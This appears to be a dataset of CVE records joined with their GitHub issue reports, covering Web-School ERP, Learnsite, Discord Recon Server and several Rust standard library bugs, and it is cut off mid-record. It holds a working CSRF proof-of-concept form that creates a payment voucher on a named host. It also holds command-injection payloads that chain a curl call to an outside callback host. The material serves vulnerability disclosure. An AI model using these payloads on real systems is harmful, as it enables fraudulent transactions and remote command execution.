**Product** : Web-School ERP V 5.0 **Description**: Web-School ERP V 5.0 contains a cross-site request forgery (CSRF) vulnerability that allows a remote attacker to create a voucher payment request through module/accounting/voucher/create. The application fails to validate the CSRF token for a POST request using admin privilege. **Recommendations :** 1- Implement `X-CSRF-TOKEN` and make sure it's validating in back-end server as well 2- Implement an interceptor which appends token value to every (state-changing) request in custom request header `X-XSRF-TOKEN-B ` **Video POC** : [Google Drive ](https://drive.google.com/file/d/1Rf8GlT_KD18KQzxPmnSXpdEYEKOojYNx/view?usp=sharing) **POC** : ``` <!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <style> body, html { height: 100%; margin: 0; } .bg { /* The image used */ background-image: url("https://avatars.githubusercontent.com/u/78818477?s=400&u=b18f9de63b3df28e6e1b4d2dc64303048aa5f5b5&v=4"); /* Full height */ height: 100%; /* Center and scale the image nicely */ background-position: center; background-repeat: no-repeat; background-size: cover; } </style> </head> <body> <div class="bg"></div> <p>CSRF CVE-2021-30114 , After clicking below button a voucher payment will be created !!.</p> </body> <form enctype="multipart/form-data" method="POST" action="http://demowebsch.web-school.in/index.php/accounting/voucher/create"> <input class="form-control hasDatepicker" placeholder="Date" value="2021-04-08" autocomplete="" label="" id="date" name="Datemaster[transactiondate]" type="text" > <input class="form-control" name="Voucher[vouchermasterid]" id="Voucher_vouchermasterid" value="9"> <input class="form-control" label="" name="Voucher[voucherheadid]" id="Voucher_voucherheadid" value="5"> <input class="form-control" value="67" name="Voucher[vouchernumber]" id="Voucher_vouchernumber" type="hidden"> <input class="form-control" label="" name="Voucher[accountgroupid]" id="Voucher_accountgroupid" value="8"> <input class="form-control" label="" name="Voucher[toaccount]" id="Voucher_toaccount" value="3"> <input class="form-control" name="Voucher[payment_mode]" id="Voucher_payment_mode" value="2"> <input class="form-control" placeholder="Amount" name="Voucher[credit]" id="Voucher_credit" type="text" value="5800"> <input class="form-control" type="text" placeholder="Narration" name="Voucher[description]" id="Voucher_description" value="CSRF everywhere "> <input class="btn btn-info" onclick=" return validate11()" type="submit" name="yt0" value="Create"> ```
CVE-2021-30114
https://api.github.com/repos/0xrayan/CVEs/issues/2/comments
0
2021-04-08T00:29:10Z
2021-04-08T00:30:16Z
https://github.com/0xrayan/CVEs/issues/2
852,945,686
2
1,811
CVE-2021-27522
2021-04-08T16:15:13.473
Learnsite 1.2.5.0 contains a remote privilege escalation vulnerability in /Manager/index.aspx through the JudgIsAdmin() function. By modifying the initial letter of the key of a user cookie, the key of the administrator cookie can be obtained.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/WaterCountry/Learnsite/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/WaterCountry/Learnsite/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:learnsite_project:learnsite:1.2.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D4C0B60A-0321-4F55-8BED-B93126F34599", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/WaterCountry/Learnsite/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "WaterCountry", "Learnsite" ]
There is an identity forgery vulnerability
https://api.github.com/repos/WaterCountry/Learnsite/issues/1/comments
1
2021-02-17T14:26:22Z
2021-02-17T14:50:58Z
https://github.com/WaterCountry/Learnsite/issues/1
810,231,723
1
1,812
CVE-2021-21433
2021-04-09T18:15:13.693
Discord Recon Server is a bot that allows you to do your reconnaissance process from your Discord. Remote code execution in version 0.0.1 would allow remote users to execute commands on the server resulting in serious issues. This flaw is patched in 0.0.2.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.9, "baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.1, "impactScore": 6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DEMON1A/Discord-Recon/commit/26e2a084679679cccdeeabbb6889ce120eff7e50" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/DEMON1A/Discord-Recon/issues/6" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/DEMON1A/Discord-Recon/security/advisories/GHSA-65fm-5x64-gv9x" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DEMON1A/Discord-Recon/commit/26e2a084679679cccdeeabbb6889ce120eff7e50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/DEMON1A/Discord-Recon/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/DEMON1A/Discord-Recon/security/advisories/GHSA-65fm-5x64-gv9x" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:demon1a:discord-recon:*:*:*:*:*:*:*:*", "matchCriteriaId": "E569C42D-3A2C-40F8-9A2E-D5D1B185047B", "versionEndExcluding": "0.0.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/DEMON1A/Discord-Recon/issues/6
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "DEMON1A", "Discord-Recon" ]
- .dirsearch anything&&curl https://a584256e6f050954f9eff2a68dc61fdb.m.pipedream.net/ - .anytool anything&&curl https://a584256e6f050954f9eff2a68dc61fdb.m.pipedream.net/ <img src=https://media.discordapp.net/attachments/812515714501312522/814441339852816384/unknown.png> Note: عشان انتا اخويا ضيف الراجل الجدع محبتش اهنكرك Kind Regards, @3x3s
Blind-RCE On .dirsearch and .arjun Commands.
https://api.github.com/repos/DEMON1A/Discord-Recon/issues/6/comments
5
2021-02-25T10:26:02Z
2021-02-25T11:14:33Z
https://github.com/DEMON1A/Discord-Recon/issues/6
816,301,033
6
1,813
CVE-2015-20001
2021-04-11T20:15:12.237
In the standard library in Rust before 1.2.0, BinaryHeap is not panic-safe. The binary heap is left in an inconsistent state when the comparison of generic elements inside sift_up or sift_down_range panics. This bug leads to a drop of zeroed memory as an arbitrary type, which can result in a memory safety violation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/25842" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/25856" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/25842" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/25856" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "F400154F-DE83-4FC8-8869-5A3B5334F43D", "versionEndExcluding": "1.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/rust-lang/rust/issues/25842
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
BinaryHeap is using `zeroed()` and may not be exception safe. I.e. it is in an inconsistent state after being recovered after panic. See issue #25662 and others. Relevant code is [BinaryHeap::sift_up, sift_down_range](https://github.com/rust-lang/rust/blob/47f9e528f13403f48dc0521f360055430da6d538/src/libcollections/binary_heap.rs#L485-L527) cc @cmr
BinaryHeap is not exception safe
https://api.github.com/repos/rust-lang/rust/issues/25842/comments
5
2015-05-27T22:07:40Z
2015-05-28T21:48:47Z
https://github.com/rust-lang/rust/issues/25842
81,645,685
25,842
1,814
CVE-2020-36317
2021-04-11T20:15:12.390
In the standard library in Rust before 1.49.0, String::retain() function has a panic safety problem. It allows creation of a non-UTF-8 Rust string when the provided closure panics. This bug could result in a memory safety violation when other string APIs assume that UTF-8 encoding is used on the same string.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/78498" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/78499" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/78498" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/78499" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "BD1E66EA-8E0B-4250-9221-20DAECA969B5", "versionEndExcluding": "1.49.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/rust-lang/rust/issues/78498
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
While `String::retain` executes it may temporarily leave the `String` in an inconsistent state, in particular it may contain invalid utf8. This is safe because it restores this invariant before returning, but the caller may skip this by panicing inside the closure and catching the unwind it outside. This allows to create `String`s that are not utf8, breaking the library invariant without using `unsafe`. For example the following will panic at the final assertion, while I would expect it to never fail when `s` has type `String`: ```rust let mut s = "0è0".to_string(); let _ = std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| { let mut count = 0; s.retain(|_| { count += 1; match count { 1 => false, 2 => true, _ => panic!(), } }); })); assert!(std::str::from_utf8(s.as_bytes()).is_ok()); // This will fail ```
String::retain allows safely creating invalid (non-utf8) strings when abusing panic
https://api.github.com/repos/rust-lang/rust/issues/78498/comments
1
2020-10-28T19:14:36Z
2020-10-30T00:28:31Z
https://github.com/rust-lang/rust/issues/78498
731,720,421
78,498
1,815
CVE-2021-28875
2021-04-11T20:15:12.627
In the standard library in Rust before 1.50.0, read_to_end() does not validate the return value from Read in an unsafe context. This bug could lead to a buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/80894" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/80895" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/80894" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/80895" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "921FB9CC-684E-4BBA-AD38-980D986D254B", "versionEndExcluding": "1.50.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "252" ]
252
https://github.com/rust-lang/rust/issues/80894
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
https://github.com/rust-lang/rust/blob/c97f11af7bc4a6d3578f6a953be04ab2449a5728/library/std/src/io/mod.rs#L358-L403 At line 393, the guard object's `.len` field is incremented by the value returned from a read implementation. If a questionable `Read` returns a value larger than the buffer size, it will take that value and set the length of the vector over the boundary. This bug is reachable from `Read::read_to_end()` and `Read::read_to_string()`. Here is a [playground link](https://play.rust-lang.org/?version=stable&mode=debug&edition=2018&gist=c0ea390522bda958c9d60ad47a42e296) that demonstrates the bug. It segfaults with `double free or corruption (out)`.
Heap buffer overflow in `read_to_end_with_reservation()`
https://api.github.com/repos/rust-lang/rust/issues/80894/comments
3
2021-01-11T01:16:29Z
2021-01-14T23:07:33Z
https://github.com/rust-lang/rust/issues/80894
782,955,723
80,894
1,817
CVE-2021-28876
2021-04-11T20:15:12.687
In the standard library in Rust before 1.52.0, the Zip implementation has a panic safety issue. It calls __iterator_get_unchecked() more than once for the same index when the underlying iterator panics (in certain conditions). This bug could lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAccess trait.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/81740" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/81741" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/81740" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/81741" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "8E9A2A10-536D-4719-9D35-637A525E1E04", "versionEndExcluding": "1.52.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/rust-lang/rust/issues/81740
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
https://github.com/rust-lang/rust/blob/e708cbd91c9cae4426d69270248362b423324556/library/core/src/iter/adapters/zip.rs#L191-L211 https://github.com/rust-lang/rust/blob/e708cbd91c9cae4426d69270248362b423324556/library/core/src/iter/adapters/zip.rs#L395-L396 There is a panic safety issue in `Zip::next()` that allows to call `__iterator_get_unchecked()` to the same index twice. `__iterator_get_unchecked()` is called at line 204 and the `index` is updated at line 206. If line 204 panics, the index is not updated and the subsequent `next()` call will use the same index for `__iterator_get_unchecked()`. This violates the second safety requirement of `TrustedRandomAccess`. Here is a [playground link](https://play.rust-lang.org/?version=stable&mode=debug&edition=2018&gist=4634eb8e3ba2ea945e7eebe76f387ae0) that demonstrates creating two mutable references to the same memory location without using unsafe Rust.
Soundness issue in `Zip::next()` specialization
https://api.github.com/repos/rust-lang/rust/issues/81740/comments
5
2021-02-04T06:49:38Z
2021-02-13T05:37:59Z
https://github.com/rust-lang/rust/issues/81740
800,988,757
81,740
1,818
CVE-2021-28878
2021-04-11T20:15:12.813
In the standard library in Rust before 1.52.0, the Zip implementation calls __iterator_get_unchecked() more than once for the same index (under certain conditions) when next_back() and next() are used together. This bug could lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAccess trait.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/82291" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/82292" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/82291" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/82292" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "8E9A2A10-536D-4719-9D35-637A525E1E04", "versionEndExcluding": "1.52.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": 